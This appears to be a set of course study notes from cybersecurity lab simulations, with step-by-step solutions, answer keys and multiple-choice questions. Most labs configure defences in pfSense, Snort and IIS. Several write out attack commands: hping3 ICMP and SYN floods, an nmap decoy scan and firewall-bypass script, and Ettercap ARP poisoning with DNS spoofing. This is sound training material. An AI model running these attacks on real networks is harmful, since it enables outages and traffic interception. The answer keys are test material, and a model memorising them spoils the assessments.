1. Sign in to the pfSense management console. a. In the Username field, enter admin. b. In the Password field, enter P@ssw0rd (zero). c. Select SIGN IN or press Enter. 2. Create and configure a firewall rule to pass HTTP traffic from the WAN to the Web server in the DMZ. a. From the pfSense menu bar, select Firewall > Rules. b. Under the Firewall breadcrumb, select DMZ. c. Select Add (either one). d. Make sure Action is set to Pass. e. Under Source, use the drop-down to select WAN net. f. Under Destination, use the Destination drop-down to select Single host or alias. g. In the Destination Address field, enter 172.16.1.5. h. Using the Destination Port Range drop-down, select HTTP (80). i. Under Extra Options, in the Description field, enter HTTP from WAN to DMZ. j. Select Save. k. Select Apply Changes. 3. Create and configure a firewall rule to pass HTTPS traffic from the WAN to the Web server in the DMZ. a. For the rule just created, select the Copy icon (two files). b. Under Destination, change the Destination Port Range to HTTPS (443). c. Under Extra Options, change the Description filed to HTTPS from WAN to DMZ. d. Select Save. e. Select Apply Changes. 4. Create and configure a firewall rule to pass all traffic from the LAN network to the DMZ network. a. Select Add (either one). b. Make sure Action is set to Pass. c. For Protocol, use the drop-down to select Any. d. Under Source, use the drop-down to select LAN net. e. Under Destination, use the drop-down to select DMZ net. f. Under Extra Options, change the Description filed to LAN to DMZ Any. g. Select Save. h. Select Apply Changes.
You are the security analyst for a small corporate network. In an effort to protect your network against security threats and hackers, you have added Snort to pfSense. With Snort already installed, you need to configure rules and settings and then assign Snort to the desired interface. In this lab, your task is to use pfSense's Snort to complete the following: Sign into pfSense using the following:Username: adminPassword: P@ssw0rd (zero) Download the:Snort free registered User rulesOinkmaster Code: 992acca37a4dbd7Snort GPLv2 Community rulesEmerging Threats Open rulesSourcefire OpenAppID detectorsAPPID Open rules Configure rule updates to happen every 4 days at 12:10 a.m.Hide any deprecated rules. Block offending hosts for 1 day. Send all alerts to the system log when the Snort starts and stops. Assign Snort to the WAN interface using a description of Snort-WANInclude:Sending alerts to the system logAutomatically blocking hosts that generate a Snort alert Start Snort on the WAN interface.
1. Sign into the pfSense management console. a. In the Username field, enter admin. b. In the Password field, enter P@ssw0rd (zero). c. Select SIGN IN or press Enter. 2. Access the Snort Global Settings. a. From the pfSense menu bar, select Services > Snort. b. Under the Services breadcrumb, select Global Settings. 3. Configure the required rules to be downloaded. a. Select Enable Snort VRT. b. In the Sort Oinkmaster Code field, enter 992acca37a4dbd7. You can copy and paste this from the scenario. c. Select Enable Snort GPLv2. d. Select Enable ET Open. 4. Configure the Sourcefire OpenAppID Detectors to be downloaded. a. Under Sourcefire OpenAppID Detectors, select Enable OpenAppID. b. Select Enable RULES OpenAppID. 5. Configure when and how often the rules will be updated. a. Under Rules Update Settings, use the Update Interval drop-down to select 4 DAYS. b. For Update Start Time, change to 12:10. c. Select Hide Deprecated Rules Categories. 6. Configure Snort General Settings. a. Under General Settings, use the Remove Blocked Hosts Interval drop-down to select 1 Day. b. Select Startup/Shutdown Logging. c. Select Save. 7. Configure the Snort Interface settings for the WAN interface. a. Under the Services breadcrumb, select Snort Interfaces and then select Add. b. Under General Settings, make sure Enable interface is selected. c. For Interface, use the drop-down to select WAN (CorpNet_pfSense_L port 1). d. For Description, use Snort-WAN. e. Under Alert Settings, select Send Alerts to System Log. f. Select Block Offenders. g. Scroll to the bottom and select Save. 8. Start Snort on the WAN interface. a. Under the Snort Status column, select the arrow. b. Wait for a checkmark to appear, indicating that Snort was started successfully.
You are the security analyst for a small corporate network. You want to make sure that guests visiting your company have limited access to the internet. You have chosen to use pfSense's captive portal feature. Guests must pass through this portal to access the internet. In this lab, your task is to: Access the pfSense management console:Username: adminPassword: P@ssw0rd (zero) Add a captive portal zone named WiFi-Guest.Use the description Guest wireless access zone Using the GuestWi-Fi interface, configure your portal as follows:Allow a maximum of 50 concurrent connections.Disconnect user from the internet if their connection is inactive for 15 minutes.Disconnect user from the internet after 45 minutes regardless of their activity.Limit users' downloads and uploads to 7000 and 2400 Kbit/s, respectively.Force to pass through your portal prior to authentication. Allow the following MAC and IP address to pass through the portal:MAC: 00:00:1C:11:22:33IP: 198.28.1.100/16Give the IP address the description of Security analyst's laptop
1. Sign into the pfSense management console. a. In the Username field, enter admin. b. In the Password field, enter P@ssw0rd (zero). c. Select SIGN IN or press Enter. 2. Add a captive portal zone. a. From the pfSense menu bar, select Services > Captive Portal. b. Select Add. c. For Zone name, enter WiFi-Guest. d. For Zone description, enter Guest wireless access zone. e. Select Save & Continue. 3. Enable and configure the captive portal. a. Under Captive Portal Configuration, select Enable. b. For Interfaces, select GuestWi-Fi. c. For Maximum concurrent connections, select 50. d. For Idle timeout, enter 15. e. For Hard timeout, enter 45. f. Scroll down and select Per-user bandwidth restriction. g. For Default download (Kbit/s), enter 7000. h. For Default upload (Kbit/s), enter 2400. i. Under Authentication, use the drop-down menu to select None, don't authenticate users. j. Scroll to the bottom and select Save. 4. Allow a MAC address to pass through the portal. a. From the Captive Portal page, select the Edit Zone icon (pencil). b. Under the Services breadcrumb, select MACs. c. Select Add. d. Make sure the Action field is set to Pass. e. For Mac Address, enter 00:00:1C:11:22:33. f. Select Save. 5. Allow an IP address to pass through the portal. a. Under the Services breadcrumb, select Allowed IP Addresses. b. Select Add. c. For IP Address, enter 198.28.1.100. d. Use the IP address drop-down menu to select 16. This sets the subnet mask to 255.255.0.0. e. For the Description field, enter Security analyst's laptop. f. Make sure Direction is set to Both. g. Select Save.
You are the security analyst for a small corporate network. After monitoring your network, you have discovered that several employees are wasting time visiting non-productive and potentially malicious websites. As such, you have added pfBlockerNG to your pfSense device. You now need to configure this feature and add the required firewall rules that allow/block specific URLs and prevent all DNS traffic from leaving your LAN network. In this lab, your task is to: Sign in to pfSense using:Username: adminPassword: P@ssw0rd (zero) Create a firewall rule that blocks all DNS traffic leaving the LAN network. Create a firewall rule that allows all DNS traffic going to the LAN network.Use the following table for the two rules:ParameterSettingProtocolUDP (53)DescriptionsFor the block rule: Block DNS from LANFor the allow rule: Allow all DNS to LAN Arrange the firewall rules in the order that allows them to function properly. Enable and configure pfBlockerNG using the information in the following table: ParameterSettingDNSBL Virtual IP192.168.0.0Top-Level Domain (TLD) Blacklistinstagram.comnetflix.comgoogleanalytics.netTop-Level Domain (TLD) Whitelist.www.google.com.play.google.com.drive.google.com
1. Sign into the pfSense management console. a. In the Username field, enter admin. b. In the Password field, enter P@ssw0rd (zero). c. Select SIGN IN or press Enter. 2. Create a firewall rule that blocks all DNS traffic leaving the LAN network. a. From the pfSense menu bar, select Firewall > Rules. b. Under the Firewall breadcrumb, select LAN. c. Select Add (either one). d. Under Edit Firewall Rule, use the Action drop-down to select Block. e. Under Edit Firewall Rule, set Protocol to UDP. f. Under Source, use the drop-down menu to select LAN net. g. Under Destination, configure the Destination Port Range to use DNS (53) (for From and To). h. Under Extra Options, in the Description field, enter Block DNS from LAN. i. Select Save. j. Select Apply Changes. 3. Create a firewall rule that allows all DNS traffic going to the LAN network. a. Select Add (either one). b. Under Edit Firewall Rule, make sure Action is set to Pass. c. Under Edit Firewall Rule, set Protocol to UDP. d. Under Destination, use the drop-down menu to select LAN net. e. Configure the Destination Port Range to use DNS (53) (for From and To). f. Under Extra Options, in the Description field, enter Allow all DNS to LAN. g. Select Save. h. Select Apply Changes. 4. Arrange the firewall rules in the order that allows them to function properly. a. Using drag-and-drop, move the rules to the following order (top to bottom): § Anti-Lockout Rule § Allow all DNS to LAN § Block DNS from LAN § In the simulated version of pfSense, you can only drag and drop the rules you created. You cannot drag and drop the default rule. b. Select Save. c. Select Apply Changes. 5. Enable pfBlockerNG. a. From the pfSense menu bar, select Firewall > pfBlockerNG. b. Under General Settings, select Enable pfBlockerNG. c. Scroll to the bottom and select Save. 6. Enable and configure DNS block lists. a. Under the Firewall breadcrumb, select DNSBL. b. Select Enable DNSBL. c. For DNSBL Virtual IP, enter 192.168.0.0. d. Scroll to the bottom and expand TLD Blacklist. e. Enter the following URLs in the TLD Blacklist box: § instagram.com § netflix.com § googleanalytics.net f. Expand TLD Whitelist and then enter the following URLs: § .www.google.com § .play.google.com § .drive.google.com g. Select Save.
You are the security analyst for a small corporate network. You want to run a test to see if you can avoid being detected by the intrusion detection systems. You have decided to use Nmap to perform a decoy scan on CorpNet.local. In this lab, your task is to perform a decoy scan on CorpNet.local: Use Zenmap or Terminal to run the scan Use Wireshark to capture the scan.Interface: enp2s0Number of random IP addresses: 5IP address to target: 192.168.0.10 Answer the question.
1. Start a Wireshark capture for the enp2s0 interface. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. From the upper-left menu, select the blue fin to start a scan. 2. Run nmap (from Terminal or Zenmap) to disguise the source IP address. a. From Zenmap: b. From the Favorites bar, select Zenmap. c. In the Command field, type nmap -D RND:5 192.168.0.10 d. Select Scan. e. As soon as Nmap completes, immediately stop Wireshark by selecting the red box. f. From Terminal: g. From the Favorites bar, select Terminal. h. At the prompt, type nmap -D RND:5 192.168.0.10 and press Enter. i. As soon as Nmap completes, immediately stop Wireshark by selecting the red box. 3. Analyze the Wireshark data. a. Maximize the Wireshark window for easier viewing. b. From Wireshark, scroll through the results until you see 192.168.0.10 in the Destination column. c. Under Source, view the different IP addresses used to disguise the scan. d. In the top right, select Answer Questions. e. Answer the question. f. Select Score Lab. 1- 192.168.0.47
While working on your Linux server, you want to practice starting, stopping, and restarting a service using the systemctl command. In this lab, your task is to: Use the systemctl command to start bluetooth.service. Use the systemctl command to stop bluetooth.service. Use the systemctl command to restart bluetooth.service.
1. Start the Bluetooth service using the systemctl command. a. From the Favorites bar, select Terminal. b. At the prompt, type systemctl start bluetooth.service and then press Enter. c. Type systemctl is-active bluetooth.service to verify that the service is active. 2. Stop the Bluetooth service using the systemctl command. a. At the prompt, type systemctl stop bluetooth.service and then press Enter. b. Type systemctl is-active bluetooth.service to verify that the service is active. 3. Restart the Bluetooth service using the systemctl command. a. At the prompt, type systemctl restart bluetooth.service and then press Enter. b. Type systemctl is-active bluetooth.service to verify that the service is active.
You are the security analyst for a small corporate network. To achieve Payment Card Industry Data Security Standard (PCI DSS) certification, you are required to scan for rogue access points quarterly. In this lab, your task is to scan for rogue wireless access points from a terminal as follows: Use airmon-ng to discover and enable the onboard wireless adapter. Use airodump-ng to scan for wireless access points. Answer the questions.
1. Start the wireless interface in monitor mode. a. From the Favorites bar, select Terminal. b. At the prompt, type airmon-ng and press Enter to view and find the name of the wireless adapter. c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode. d. Type airmon-ng and press Enter to view the new name of the wireless adapter. 2. Display a list of detected access points. a. Type airodump-ng wlp1s0mon and press Enter to scan for wireless access points. b. After a few seconds, press Ctrl + c to stop the scan. c. In the top right, select Answer Questions. d. Answer the questions. e. Select Score Lab. 1- GreatDonuts 2- -94 3- 10
You are the security analyst for a small corporate network. You are concerned about unauthorized activity in your DMZ. You have decided to set up a honeypot to study hacking attempts. In this lab, your task is to: Create a honeypot on the computer named www_stage using Pentbox. Using Google Chrome, test the honeypot on the computer named Marketing3 using the www_stage.corpnet.xyz URL. Using the www_stage system, review the effects of the intrusion. Answer the questions.
1. Use Pentbox to create a honeypot on www_stage. a. From the Favorites bar, select Terminal. b. At the prompt, type cd pentbox-1.8 and press Enter to change to the pentbox directory. c. Type ./pentbox.rb and press Enter to start Pentbox. d. Type 2 and press Enter to select Network Tools. e. Type 3 and press Enter to select Honeypot. f. Type 1 and press Enter to select Fast Auto Configuration. 2. From the Analyst-Lap computer, test the honeypot using Google Chrome. a. From the top navigation tabs, select Buildings. b. Under Building A, select Floor 2. c. Under Marketing Group B, select Marketing3. d. From the taskbar, select Google Chrome. e. In the URL field, enter www_stage.corpnet.xyz and press Enter. f. In the top right, select Answer Questions. g. Answer Question 1. h. Minimize the Lab Questions dialog. 3. Review the effects of the intrusion on www_stage. a. From the top navigation tabs, select Building A. b. Under Building A, select Basement. c. Under Basement, select www_stage.Notice the INTRUSION ATTEMPT DETECTED message at the bottom of the Pentbox window. 1- Access denied 2- 192.168.0.39
You are the security analyst for a small corporate network. To ensure that your corporate information is safe, you want to run a test to see if any clear text passwords are being exposed through an HTTP login request. In this lab, your task is to analyze HTTP POST packets as follows: Use Wireshark to capture all packets on the enp2s0 interface. Filter the captured packets to show only HTTP POST data. Examine the packets captured to find clear text passwords. Answer the questions.
1. Use Wireshark to capture all packets for a period of time. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. Select the blue fin to begin a Wireshark capture. d. After a few seconds, select the red box to stop the Wireshark capture. e. Maximize Wireshark for easier viewing. 2. Filter and examine HTTP POST packets for clear text passwords. a. In the Apply a display filter field, type http.request.method==POST and press Enter to show the HTTP POST requests. b. From the middle pane, expand HTML Form URL Encoded for each packet. c. Examine the information shown to find clear text passwords. d. In the top right, select Answer Questions. e. Answer the questions. f. Select Score Lab. 1- 5 2- 192.168.10.193 3- slimycheese4me
Which of the following BEST describes a non-disclosure agreement policy?
A policy requiring a confidentiality contract in which employees agree to not divulge certain information for a specific length of time.
Which of the following BEST describes the data security policy of data sovereignty?
A policy that dictates that data is subject to the laws of the nation in which it was collected.
Which of the following BEST describes Central Policy?
A program that checks for the correct attributes in an attribute-based system.
Which of the following BEST describes a disassembler program?
A program that translates machine code into assembly language, or low-level language
Listen to simulation instructions You are the security analyst for a small corporate network, and you want to know how to find and recognize ICMP flood attacks so you can better defend against them. You know that you can do this using Wireshark and hping3 packet generator. In this lab, your task is to create and examine the results of an ICMP flood attack as follows: From Kali Linux, start a capture in Wireshark for the esp20 interface. Ping CorpServer2 at 192.168.10.10. Examine the ICMP packets captured. Use hping3 to launch an ICMP flood attack against CorpServer2. Examine the captured ICMP packets. Answer the questions.
1. Use Wireshark to capture and analyze a ping to 192.168.10.10. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. Select the blue fin to begin a Wireshark capture. d. From the Favorites bar, select Terminal. e. From the Terminal, type ping 192.168.10.10 and press Enter. f. After some data exchanges, press Ctrl + c to stop the ping process. g. From Wireshark, select the red box to stop the Wireshark capture. h. In the Apply a display filter field, type icmp and press Enter.Notice the number of packets captured and the time between each packet being sent. 2. Use Wireshark to capture and analyze a icmp flood. a. Select the blue fin to begin a new Wireshark capture. b. From the Terminal, type hping3 --icmp --flood 192.168.10.10 and press Enter to start a ping flood against CorpServer2. c. From Wireshark, select the red box to stop the Wireshark capture.Notice the type, number of packets, and time between each packet being sent. d. From the Terminal, type Ctrl + c to stop the ICMP flood. 3. Answer the questions. a. In the top right, select Answer Questions. b. Answer the questions. c. Select Score Lab. 1- With the icmp flood, the icmp packets are sent more rapidly., With the flood, all packets come from the source.
Listen to simulation instructions You are the security analyst for a small corporate network. Several employees have reported that they are unable to connect to the network. They all seem to be getting bad IP address information from a rogue DHCP server. In this lab, your task is to identify the rogue DHCP server using Wireshark: Use Wireshark to capture and filter DHCP traffic. Disable and enable the enp2s0 network interface to request a new IP address from DHCP. Find the rogue and legitimate DHCP servers. Answer the questions
1. Use Wireshark to capture and filter DHCP traffic. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. Select the blue fin to begin a Wireshark capture. d. In the Apply a display filter field, type bootp and press Enter. 2. Disable and enable the enp2s0 network interface. a. From the Favorites bar, select Terminal. b. At the prompt, type ip addr show and press Enter to view the current IP configuration. c. Type ip link set enp2s0 down and press Enter. d. Type ip link set enp2s0 up and press Enter to enable the interface and e. select Answer Questions. 1- 20.10.10.239 2- 192.168.0.14
You are the security analyst for a small corporate network. You have heard from many customers that they are unable to browse to your public-facing web server. You suspect that it might be under some sort of denial-of-service attack, possibly a TCP SYN flood attack. Your www_stage computer is on the same network segment as your web server, so you'll use this computer to investigate the problem. In this lab, your task is to: Use Wireshark to capture packets and filter for packets with the SYN flag set.Filter for SYN packets with tcp.flags.syn==1 and tcp.flags.ack==0. Use a filter to display only packets that have the SYN flag and the ACK flag set.Filter for SYN-ACK packets with tcp.flags.syn==1 and tcp.flags.ack==1. Use a filter to only display packets that contain the ACK flag and answer the question.Filter for ACK packets with tcp.flags.syn==0 and tcp.flags.ack==1.Answer the question.
1. Use Wireshark to capture packets and filter for packets with the SYN flag set. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. From the menu, select the blue fin to begin the capture. d. In the Apply a display filter field, type tcp.flags.syn==1 and tcp.flags.ack==0 and press Enter to filter the Wireshark display to show packets with only the SYN flag. Notice that there is a flood of SYN packets being sent to 198.28.1.1 (www.corpnet.xyz). 2. Use a filter to display only packets that have the SYN flag and the ACK flag set. a. In the Apply a display filter field, change the ending of the tcp.flags.ack portion from a 0 to a 1 and press Enter to filter the Wireshark display to only those packets with both the SYN flag and ACK flag. You should notice that there are far fewer SYN-ACK packets than SYN packets. The server is so busy that it can't respond to all of the packets. b. Select the red square to stop the capture. 3. Use a filter to only display packets that contain the ACK flag and answer the question. a. In the Apply a display filter field, change the ending of the tcp.flags.syn portion from a 1 to a 0 and press Enter to filter the Wireshark display to packets with only the ACK flag. You should see ACK packets, but none of them are being sent to 198.28.1.1 (www.corpnet.xyz). In a SYN attack, the ACK packets is never sent so that it ties up the half open connections on the server. b. In the top right, select Answer Questions. c. Answer the question. d. Select Score Lab. 1- There are multiple source addresses for the SYN packets with the destination address 198.28.1.1.
You work as a security analyst for a small corporate network. During an internal test, you find that VNC is being used on the network, which violates your company's security policies. It was installed to maintain access by a malicious employee. Run a scan using nmap to discover open ports on host machines to find out which host machines are using port 5900 for VNC. In this lab, your task is to complete the following: Use Zenmap to scan for open ports running VNC. Use the table below to help you identify the computer. Go to the suspect computer and uninstall VNC. From the suspect computer, run netstat -l to verify that the ports for VNC are closed.
1. Use Zenmap to scan for open ports running VNC. a. From the Favorites bar, select Zenmap. b. In the Command field, type nmap -p 5900 192.168.0.0/24. c. Select Scan. d. From the results, find the computer with port 5900 open. 2. Uninstall VNC from the suspect computer. a. From the top navigation tabs, select Floor 1 Overview. b. Under Support Office, select Support. c. From the Favorites bar, select Terminal. d. At the prompt, type netstat -l and press Enter to confirm the port is open on the machine. e. Type dnf list vnc and press Enter to find the package name. f. Type dnf erase libvncserver and press Enter. g. Press Y and press Enter to uninstall the package. 3. Type netstat -l and press Enter to confirm that the port has been closed on the machine.
You are the security analyst for a small corporate network. You are concerned with the safety of your company's firewalls. During some testing, you discovered a firewall with an IP address of 198.28.1.1. You have decided to do further testing from outside the network by scanning this firewall for potential weakness by running an nmap scan. In this lab, your task is to: Run the firewall-bypass nmap script against the firewall. Answer the question.
1. Use nmap to scan the network for potential weakness. a. From the Favorites bar, select Terminal. b. Type nmap --script=firewall-bypass 198.28.1.1 and press Enter. 2. Answer the questions. a. In the top right, select Answer Questions. b. Answer the questions. c. Select Score Lab. 1 - VPN
Vulnerability scanning has its limitations. Which answer BEST describes the concept of point in time?
A scan can only obtain data for the period of time that it runs.
Which of the following BEST describes a network policy?
A set of conditions, constraints, and settings used to authorize which remote users and computers can or cannot connect to a network.
You are a cybersecurity analyst for a small corporate network. The CorpServer host server has several virtual guest servers running on it (see table). The IT team has been troubleshooting an issue and tells you that they can ping some of the servers but not others. They have asked you to troubleshoot why they can only ping certain servers. In this lab, your task is to use ping and hping3 to troubleshoot connectivity for the guest servers. Use ping and hping3 to test connectivity to each server and note the results
1. Use ping to test your connectivity to the servers in your network. a. From the Favorites bar, select Terminal. b. Type ping -c 3 <ip address or server name> and press Enter. Note the results. c. Repeat step b for each applicable server. d. In the top right, select Answer Questions. e. Answer Questions 1 and 2. 2. Use hping3 to test your connectivity to the servers that failed using the ping command. a. Type hping3 -c 3 -n <ip address or server name> and press Enter. Note the results. b. Repeat step b for each applicable server. c. Answer Question 3. d. Select Score Lab. ANSWERS: 1- CorpFiles16 (192.168.0.12), CorpFiles (192.168.0.13), CorpWeb (192.168.0.15) 2- A firewall is blocking ICMP packets. 3- The hping3 command uses TCP packets by default.
You are the security analyst for your company. Through reconnaissance, it was found that a partner company website is broadcasting banner information. Your manager wants you to help them hide IIS banners. In this lab, your task is to configure the IIS web server to stop broadcasting banners by removing HTTP response headers from the partnercorp.xyz website.
1. Use the IIS Manager to access the PartnerCorp.xyz website. a. From Server Manager, select Tools > Internet Information Services (IIS) Manager. b. From the left pane, expand PartnerWeb(partnercorp.xyz\Administrator) Home. c. Expand Sites. d. Select partnercorp.xyz. 2. Remove all HTTP response headers. a. From the center pane, double-click HTTP Response Headers. b. Select a response header. c. Under Actions, select Remove. d. Select Yes to confirm. e. Repeat steps 2b-2d for the second response header.
As a security analyst, you often scan for any zombie processes that might be running on your computer. In this lab, your task is to: Use the ps command to find all zombie processes. Use the applicable ps options to:Show the processes for all users.Display the process's user/owner.Show the processes not attached to a terminal. Kill all zombie processes found using kill -9.
1. Use the ps aux command to find any zombie processes running. a. From the Favorites bar, select Terminal. b. At the prompt, type ps aux | less and press Enter to view the list of processes. c. Use the Page Up/Page Down keys to find the processes with status z. d. Type q to exit the process list and return to Command Prompt. e. In the top right, select Answer Questions. f. Answer Question 1. 2. Terminate the zombie processes. a. Type kill -9 1260 and press Enter. b. Type kill -9 1430 and press Enter. c. Type kill -9 2165 and press Enter. d. Select Score Lab. Answer: 3
You are the security analyst for a small corporate network. You suspect that your Linux system may have been compromised. In this lab, your task is to: Use the ps command to view and analyze the status of the Linux processes. Answer the questions about the processes that may be indications of compromise. Answer the questions.
1. Use the ps aux command to view the list of processes on your Linux system. a. From the Favorites bar, select Terminal. b. At the prompt, type ps aux | less and press Enter to view the list of processes. 1- 1194 2- Running 3- 3.0 4- Python
You are the security analyst for a small corporate network. You are concerned that several employees may still be using the unsecured FTP protocol against company policy. You have decided to run a test to see if FTP is being used. If any FTP packets are found, you need to determine information about who is using this protocol. In this lab, your task is to capture FTP packets as follows: Use Wireshark to capture packets on the enp2s0 interface for five or more seconds. Filter for FTP packets. Answer the questions.
1. Using Wireshark, capture packets for five seconds. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. Select the blue fin to begin a Wireshark capture. d. Capture packets for five seconds. e. Select the red box to stop the Wireshark capture. f. Maximize the window for easier viewing. 2. Apply the FTP filter and answer the questions. a. In the Apply a display filter field, type ftp and press Enter. b. In the top right, select Answer Questions. c. Answer the questions. 1- Guest 2- Fr33to@ll 3- SalesContacts.txt 4- 192.168.0.50
You are the security analyst for a small corporate network. You know that a denial of service attack (DoS attack) can make a machine or network resource unavailable to the employees in your company. These types of DoS attacks are often done by flooding the network with TCP SYN packets. To ensure that you are able to find and analyze a TCP SYN flood attack, you have decided to use the Linux tool named hping3 to simulate a SYN flood attack against your CorpTest server. In this lab, your task is to capture and analyze a TCP SYN flood attack as follows: Use Wireshark to capture packets on the enp2s0 interface. Using the Linux Terminal, ping CorpTest (192.168.10.19) to verify connectivity. Note the packets in Wireshark. Set a display filter in Wireshark to show only TCP SYN packets. Use hping3 to launch a SYN flood attack against CorpTest (192.168.10.19) . After capturing packets for a few seconds, examine a SYN packet with the destination address of 192.168.10.19. Answer the question.
1. Using Wireshark, capture packets on the enp2s0 interface. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. Select the blue fin to begin a Wireshark capture. 2. Using a Terminal, ping CorpTest (192.168.10.19). a. From the Favorites bar, select Terminal. b. At the prompt, type ping CorpTest (or 192.168.10.19) and press Enter. c. Note the packets captured in Wireshark. d. After a few seconds, type Ctrl-C to stop the ping. 3. Filter the packet capture to show only SYN packets, then start a SYN flood. a. In Wireshare's Apply a display filter field, type tcp.flags.syn==1 and press Enter. b. From the Terminal, type hping3 --syn --flood CorpTest (or 192.168.10.19) and press Enter to start a TCP SYN flood against the CorpTest server. c. After a few seconds of capturing packets, select the red box to stop the Wireshark capture.1- 0x002
Which of the following BEST describes a relational database?
A storage bank for data that is organized in tables linked by keys and which can be searched in multiple ways through those keys.
Which of the following BEST describes a rainbow table?
A table of passwords and the computed matching hashes.
You are the security analyst for a small corporate network. In an effort to defend against DNS spoofing attacks, which are part of on-path (man-in-the-middle) attacks, you have decided to use Ettercap to initiate DNS spoofing in an attempt to analyze its affects on the RMK office supplies site. In this lab, your task is to: View normal access to the RMK Office Supplies web site: rmksupplies.com Use Ettercap to:Begin unified sniffing on the enp2s0 interface.Set Exec (192.168.0.30) as the target machine.Add and enable DNS spoofing using an Ettercap plugin.Initiate ARP poisoning on remote connections. From Exec, use Google Chrome to access rmksupplies.com and analyze the results. Answer the question.
1. View normal access to the RMK Office Supplies web site. a. From the taskbar of the Linux computer named Support, select Google Chrome. b. In the URL field, type rmksupplies.com and press Enter.Notice that you are taken to the RMK Office Supplies site. c. Close Google Chrome. 2. Use Ettercap to begin unified sniffing on the enp2s0 interface. a. From the Favorites bar, select Ettercap. b. Select Sniff > Unified sniffing. c. From the Network Interface drop-down list, select enp2s0. d. Select OK. 3. Set Exec (192.168.0.30) as the target machine. a. Select Hosts > Scan for hosts. b. Select Hosts > Host list. c. Under IP Address, select 192.168.0.30. d. Select Add to Target 1 to assign it as the target. 4. Initiate DNS spoofing using an Ettercap plugin. a. Select Plugins > Manage the plugins. b. Select the Plugins tab. c. Double-click dns_spoof to activate it. 5. Initiate ARP poisoning on remote connections. a. Select Mitm > ARP poisoning. b. Select Sniff remote connections. c. Select OK. 6. From Exec, access rmksupplies.com. a. From the top navigation tabs, select Floor 1 Overview. b. Under Executive Office, select Exec. c. From the taskbar, select Google Chrome. d. In the URL field, type rmksupplies.com and press Enter. e. In the top right, select Answer Questions. f. Answer the question. g. Select Score Lab. 1- Queries to the rmksupplies.com site were redirected to the RUS Office Supplies site.
Listen to simulation instructions You are the security analyst for a small corporate network. You just downloaded a new release of the ThreatProtec program, which you use to do your job. You need to make sure the file was not altered before you received it. To help do this, you also downloaded the ThreatProtec_hash.txt file, which contains the original file hash for the new release of the ThreatProtec program. The two files are located in C:\Downloads. In this lab, your task is to use MD5 hash files to confirm that the ThreatProtec.zip file was unaltered as follows: Use Windows PowerShell to:Generate a file hash for ThreatProtec.zip.Extract the hash from the ThreatProtec_hash.txt.Compare the two hashes using the applicable cmdlet to see if they match. You can highlight text in PowerShell and right-click it to copy the text to the active line. Answer the question.
1. View the files in the C:\Downloads folder. a. Right-click Start and select Windows PowerShell (Admin). b. At the prompt, type cd \downloads and press Enter to navigate to the directory that contains the files. c. Type dir and press Enter to view the available files. 2. Obtain the hash files for the new releases of the software. a. Type get-filehash ThreatProtec.zip -a md5 and press Enter to view the MD5 hash for the new release. b. Type get-content ThreatProtec_hash.txt and press Enter to view the known hash contained in the .txt file. 3. Compare the hashes and answer the question. a. Type "calculated hash" -eq "known hash" and press Enter to determine if the file hashes match. b. In the top right, select Answer Questions. c. Answer the question. d. Select Score Lab. 1- YES
A new openSSH vulnerability has been discovered. You are tasked with finding all systems running an SSH service on the network. The nmap 192.168.122.0/24 command has been run to find all potentially vulnerable systems, and the output is shown below. Which machines on the following IP addresses will likely need their SSH software updated immediately? (Select two.)
192.168.122.82 192.168.122.1
Your company has decided to use a Pentbox honeypot to learn which types of attacks may be targeting your site. They have asked you to install and configure the honeypot. You have already installed Pentbox. Which menu allows you to configure the honeypot?
2- Network tools
Which of the following frequency ranges does Bluetooth operate in?
2.4 GHz
By default, Lightweight Directory Access Protocol (LDAP) is unsecure, but it should not be blocked since it is widely used in normal operations. Instead, you should use the secure version. Which of the following ports is used for the secure version of LDAP?
636
How many numbering authorities comprise the CVE?
94
Which of the following would be good for multiple domains and subdomains?
A (SAN) certificate
The information below is from Wireshark. Which kind of attack is occurring?
A DDoS attack
You are in the process of configuring pfSense Snort as your intrusion detection and prevention system (IDS/IPS). You have configured the options shown in the image, but when you try to save your changes, pfSense won't let you continue. What did you forget to configure?
A Snort Oinkmaster Code was not entered.
Which of the following BEST describes a cacheable system?
A client cache has the right to reuse response data for equivalent requests that come later.
Which of the following are characteristics of a RESTful API? (Select two.)
A client-server architecture managed through HTTP. A layered system that organizes server types.
Members of the executive team have asked for an explanation as to why the bit size of an encryption key needs to be higher than the 56-bit RC4 they are using. They show you a screenshot of the research they've done on the powerful desktop computer they run, saying that none of the keys they are using will be in production for more than a year. They want to just keep using the smaller keys. How would you answer them?
A cluster or use of cloud computing could break this in a very short period of time.
You are the security analyst working for CorpNet (198.28.1.1). You are trying to see if you can discover weaknesses in your network. You have just run the nmap command shown in the image. Which weakness, if any, was found?
A compromise was found while scanning port 8080.
Which of the following BEST describes phishing?
A cyberattack in which an email purporting to be from a legitimate organization is sent with a malicious payload.
The DKIM tool can provide security for your company's emails because it contains which of the following?
A digital signature
You are monitoring network activity and find that a user appears to be logging into the network and downloading files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced?
A horizontal privilege escalation attack
Which answer BEST describes the purpose of CVE?
A list of standardized identifiers for known software vulnerabilities and exposures.
